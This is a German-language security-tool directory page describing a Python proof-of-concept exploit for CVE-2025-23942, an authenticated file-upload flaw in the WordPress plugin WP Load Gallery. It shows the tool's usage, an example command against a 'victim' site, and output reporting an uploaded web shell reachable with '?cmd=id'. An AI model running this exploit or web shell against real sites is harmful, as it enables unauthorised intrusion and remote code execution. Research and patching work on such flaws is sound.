Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - Authentifiziert (Autor+) Beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-23942-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Authentifiziert (Autor+) Beliebiger Datei-Upload

Repository anzeigen
32vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WP Load Gallery Exploit (CVE-2025-23942)

📌 Beschreibung

Die Schwachstelle 'Unrestricted Upload of File with Dangerous Type' in NgocCode WP Load Gallery ermöglicht das Hochladen einer Web-Shell auf einen Webserver. Dieses Problem betrifft WP Load Gallery: von n/a bis 2.1.6.

⚠️ Schwachstellendetails

  • CVE ID: CVE-2025-23942
  • Betroffenes Plugin: WP Load Gallery
  • Betroffene Versionen: Bis 2.1.6
  • Schwachstellentyp: Unrestricted File Upload
  • Schweregrad: Kritisch (9.1 CVSS)
  • Angriffsvektor: Authentifiziert (Autor+) Remote Code Execution (RCE)
  • Patch verfügbar: ❌ (Noch kein offizieller Patch)

🚀 Funktionen des Exploits

✅ Automatisierte Ausnutzung – Extrahiert Nonce, meldet sich an und lädt die Shell automatisch hoch.
✅ Versionsprüfung – Bestätigt, ob das Ziel verwundbar ist, bevor die Ausnutzung erfolgt.
✅ Fehlerbehandlung – Stellt einen reibungslosen Ablauf auch bei Fehlern sicher.
✅ Sitzungsverwaltung – Verwendet persistente Sitzungsverwaltung für die Authentifizierung.
✅ Echtzeit-Feedback – Gibt zu jedem Schritt eine Ausgabe.

🛠️ Anforderungen

  • Python 3.x
  • requests module (pip install requests)
  • Ein gültiges WordPress Author+-Konto auf dem Zielsystem

🔥 Verwendung

Führen Sie das Skript mit den erforderlichen Parametern aus:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Beispiel:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Beispielausgabe

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Rechtlicher Hinweis

Dieses Exploit ist für ausschließlich Bildungs- und Sicherheitsforschungszwecke bestimmt. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine explizite Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieses Skripts. ( Khaled_alenazi )

Tool herunterladen